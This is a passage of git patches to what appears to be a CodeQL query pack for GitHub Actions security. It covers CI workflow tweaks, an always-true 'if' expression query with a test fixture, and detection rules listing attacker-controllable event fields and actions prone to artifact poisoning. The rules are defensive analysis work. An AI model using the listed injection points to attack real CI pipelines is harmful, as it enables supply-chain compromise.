a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 00000000000..8d24f44ed32 --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,14 @@ +name: Tests +on: + push: + pull_request: + +permissions: {} + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - run: | + codeql test run ql/test From 86cc50971b00ee7444bb6d13cc9483d3ed38480a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:30:15 +0200 Subject: [PATCH 0182/1267] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8d24f44ed32..bbd894057bc 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -2,6 +2,7 @@ name: Tests on: push: pull_request: + workflow_dispatch: permissions: {} From a29e0c438d6fe730700769a99138c737344ff185 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:38:27 +0200 Subject: [PATCH 0183/1267] Update test.yml --- .github/workflows/test.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index bbd894057bc..e5040834985 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -11,5 +11,9 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | codeql test run ql/test From a4cf78b9ed6bcc7d08311e4aebd565480b1b2205 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:43:20 +0200 Subject: [PATCH 0184/1267] Update test.yml --- .github/workflows/test.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index e5040834985..6e190ff9612 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -4,15 +4,13 @@ on: pull_request: workflow_dispatch: -permissions: {} - jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 with: - token: ${{ secrets.BUGHALLA_TOKEN }} + token: ${{ secrets.SECLAB_TOKEN }} fetch-depth: 0 - run: | From bd4f158b22ebcc90cc6e42d7a3c95e879b03a7ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:48:40 +0200 Subject: [PATCH 0185/1267] Update test.yml --- .github/workflows/test.yml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 6e190ff9612..a0dc2688ce2 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,9 +9,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 with: - token: ${{ secrets.SECLAB_TOKEN }} - fetch-depth: 0 - + languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | codeql test run ql/test From 591dfe07fefd261a0110adc17dce77bdbb9627fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:55:09 +0200 Subject: [PATCH 0186/1267] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 9e0fee9a0f7..0384660acc1 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,10 +10,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions @@ -28,4 +24,4 @@ jobs: repository: bughalla/codeql-actions github_token: ${{ secrets.BUGHALLA_TOKEN }} branch: ${{ github.ref }} - force: true \ No newline at end of file + force: true From 5d5a02ccc34aeefdbefa78ffa673a6300d593e11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 22:02:04 +0200 Subject: [PATCH 0187/1267] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index a0dc2688ce2..4aeed100c80 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,4 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib codeql test run ql/test From d69c10c4f6f57cc3a2793ae8c6eb676d99dcabd2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:40:44 +0200 Subject: [PATCH 0188/1267] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 4aeed100c80..245baea4667 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,5 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack install ql/lib + codeql pack download ql/lib codeql test run ql/test From c681b13046ad5379fcb7a8e8e748ea3487c7b236 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 09:55:12 +0200 Subject: [PATCH 0189/1267] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 0384660acc1..572d987ce37 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,6 +10,10 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions From 6bc0d6dc32ec9f20a541ded7ecd4cce3b70b701c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:59:15 +0200 Subject: [PATCH 0190/1267] Update test.yml --- .github/workflows/test.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 245baea4667..227b834f039 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,11 +9,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter - name: Initialize CodeQL id: init run: | From 8c8a9b8a189d83c077687a1fe5db0d46614b96bb Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 10:01:55 +0200 Subject: [PATCH 0191/1267] Update test.yml --- .github/workflows/test.yml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 227b834f039..89393407948 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,18 +9,11 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init - run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 + with: + languages: javascript # does not matter - run: | codeql pack download ql/lib codeql test run ql/test From 5190e0865cdfcd57fc6d62c61aeca8d4d3da16e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 10:29:12 +0200 Subject: [PATCH 0192/1267] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 89393407948..5efa1ae3dae 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -5,7 +5,7 @@ on: workflow_dispatch: jobs: - build: + tests: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From e200746678e0bf2a7944f919d4817ebf46ab1f2a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:31:22 +0200 Subject: [PATCH 0193/1267] remove qlpack locks from repo --- .gitignore | 3 ++- ql/src/codeql-pack.lock.yml | 16 ---------------- ql/test/codeql-pack.lock.yml | 16 ---------------- 3 files changed, 2 insertions(+), 33 deletions(-) delete mode 100644 ql/src/codeql-pack.lock.yml delete mode 100644 ql/test/codeql-pack.lock.yml diff --git a/.gitignore b/.gitignore index 4ba9d315acc..b874cdb64ce 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,8 @@ .DS_Store **/*.testproj +**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ -.cache \ No newline at end of file +.cache diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c..00000000000 --- a/ql/src/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml deleted file mode 100644 index 8494dea432f..00000000000 --- a/ql/test/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.8 - codeql/dataflow: - version: 0.1.8 - codeql/ssa: - version: 0.2.8 - codeql/typetracking: - version: 0.2.8 - codeql/util: - version: 0.2.8 - codeql/yaml: - version: 0.2.9 -compiled: false From 96abb193c76193ccf7799fd7acd6dae5b53ae736 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:39:03 +0200 Subject: [PATCH 0194/1267] Update test.yml --- .github/workflows/test.yml | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 5efa1ae3dae..f8071c2986d 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,11 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack download ql/lib codeql test run ql/test From 071329400686f658fae6fd54eaf1fbaf696373f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:52:56 +0200 Subject: [PATCH 0195/1267] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index f8071c2986d..390b35cd233 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,4 +22,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/test codeql test run ql/test From 417830020df70d6b5e169c948d1fd29669d0be8a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:55:08 +0200 Subject: [PATCH 0196/1267] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 390b35cd233..51d66e5ee48 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,5 +22,7 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib + codeql pack install ql/src codeql pack install ql/test codeql test run ql/test From ecf81989844d4ce2f27703b981a0954448afaa59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:00:02 +0200 Subject: [PATCH 0197/1267] Update test.yml --- .github/workflows/test.yml | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 51d66e5ee48..78808fb8211 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,18 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - run: | codeql pack install ql/lib codeql pack install ql/src From 843d9e24c4c49ec180b6766c573df02fcd4d03ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:05:09 +0200 Subject: [PATCH 0198/1267] Update test.yml --- .github/workflows/test.yml | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 78808fb8211..ed4997285c6 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -20,8 +20,17 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - run: | - codeql pack install ql/lib - codeql pack install ql/src - codeql pack install ql/test + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql # to make stubs available for tests + codeql pack download "codeql/actions-queries" + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | codeql test run ql/test From a222bfc33d3c3d8b513cd752cdd934b22467e8f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:07:00 +0200 Subject: [PATCH 0199/1267] Update test.yml --- .github/workflows/test.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index ed4997285c6..8b14b75062a 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -24,8 +24,7 @@ jobs: env: GITHUB_TOKEN: ${{ github.token }} run: | - gh repo clone github/codeql # to make stubs available for tests - codeql pack download "codeql/actions-queries" + gh repo clone github/codeql codeql pack install "ql/lib" codeql pack install "ql/src" codeql pack install "ql/test" From febba3d6d303da77541c32569e136c36c8a40ba4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:20 +0200 Subject: [PATCH 0200/1267] Update gitignore --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index b874cdb64ce..173a5dd5d09 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,5 @@ .DS_Store **/*.testproj -**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ From 19a87a13db5b6fc67ff1bd9df5891dad996ae783 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:58 +0200 Subject: [PATCH 0201/1267] Update lock files --- ql/lib/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/test/codeql-pack.lock.yml | 16 ++++++++++++++++ 4 files changed, 52 insertions(+), 4 deletions(-) create mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/src/codeql-pack.lock.yml create mode 100644 ql/test/codeql-pack.lock.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 00000000000..84a6ccba26d --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ff8e02aa63e..64e2861cf68 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.11 dependencies: - codeql/controlflow: "*" - codeql/dataflow: "*" - codeql/util: "*" - codeql/yaml: "*" + codeql/util: ^0.2.0 + codeql/yaml: ^0.1.2 + codeql/controlflow: ^0.1.0 + codeql/dataflow: ^0.1.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 00000000000..84a6ccba26d --- /dev/null +++ b/ql/src/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml new file mode 100644 index 00000000000..84a6ccba26d --- /dev/null +++ b/ql/test/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false From cb1e19a3179831f70d3a85e4f50346e795ba9adc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:10 +0200 Subject: [PATCH 0202/1267] New ExpressionIdAlwaysTrue query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../CWE-571/ExpressionIsAlwaysTrue.ql | 24 ++++++++ .../CWE-571/.github/workflows/test.yml | 60 +++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 + 5 files changed, 90 insertions(+) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7e1bfdee589..8a3dfb7b2a7 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -332,6 +332,8 @@ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } Expression getConditionExpr() { result = super.getConditionExpr() } + + string getConditionStyle() { result = super.getConditionStyle() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a66befe7d7d..dff5f351a69 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -666,6 +666,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } + + /** Get condition scalar style. */ + string getConditionStyle() { result = n.(YamlScalar).getStyle() } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql new file mode 100644 index 00000000000..0a951cbabe1 --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -0,0 +1,24 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @security-severity 9.0 + * @problem.severity error + * @precision high + * @id actions/if-expression-always-true + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from If i +where + i.getConditionStyle() = ["|", ">"] + or + i.getCondition().matches("%${{%") and + not i.getCondition().matches("${{%") + or + count(i.getCondition().splitAt("${{")) > 2 +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml new file mode 100644 index 00000000000..16b725b5ee8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -0,0 +1,60 @@ +name: Conditionally process PR + +on: + pull_request_target: + types: [opened, synchronize, reopened] + +jobs: + process-pr: + runs-on: ubuntu-latest + steps: + - name: Test1 + if: 1 == 2 + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ 1 == 2 }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ 1 == 2 }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ 1 == 2 }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + 1 == 2 || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + 1 == 2 || + 3 == 4 }} + - name: Test 9 + if: '${{ 1 == 2 }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{1 == 2 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ 1 == 2 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ 1 == 2 }}" + run: echo "Test 12 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref new file mode 100644 index 00000000000..01235fb6a20 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrue.ql From 7a8af5e8ea1c5697dfff38ff5e4d0475f1fd038a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:35 +0200 Subject: [PATCH 0203/1267] Additional sources --- .../codeql/actions/dataflow/FlowSources.qll | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c937aaa550b..0dc376765a8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -120,12 +120,30 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } +bindingset[context] +private predicate isExternalUserControlledRepositoryDispatch(string context) { + exists(string reg | + reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowDispatch(string context) { + exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | @@ -137,7 +155,9 @@ private class EventSource extends RemoteFlowSource { isExternalUserControlledGollum(context) or isExternalUserControlledCommit(context) or isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + isExternalUserControlledWorkflowRun(context) or + isExternalUserControlledRepositoryDispatch(context) or + isExternalUserControlledWorkflowDispatch(context) ) } From d504cd9b4d5c36ba1146d3b73acef52d801fad54 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:20:09 +0200 Subject: [PATCH 0204/1267] Better detection of poisonable steps --- .../security/ArtifactPoisoningQuery.qll | 53 ++++++- .../CWE-094/.github/workflows/level0.yml | 135 +++++++++++++++++ .../CWE-094/.github/workflows/level1.yml | 37 +++++ .../Security/CWE-094/CodeInjection.expected | 3 + .../CWE-094/PrivilegedCodeInjection.expected | 6 + .../.github/workflows/artifactpoisoning34.yml | 25 ++++ .../CWE-829/.github/workflows/level0.yml | 136 ++++++++++++++++++ .../.github/workflows/untrusted_checkout.yml | 7 + .../CWE-829/ArtifactPoisoning.expected | 3 + .../PrivilegedArtifactPoisoning.expected | 4 + .../CWE-829/UnpinnedActionsTag.expected | 1 + .../CWE-829/UntrustedCheckout.expected | 4 +- 12 files changed, 406 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d5c1567f8a5..95dc22a40de 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -230,16 +230,55 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { abstract class PoisonableStep extends Step { } -class CommandExecutionRunStep extends PoisonableStep, Run { - CommandExecutionRunStep() { +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 +private string dangerousActions() { + result = + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] +} + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + this.getCallee() = dangerousActions() + ) + } +} + +// source: 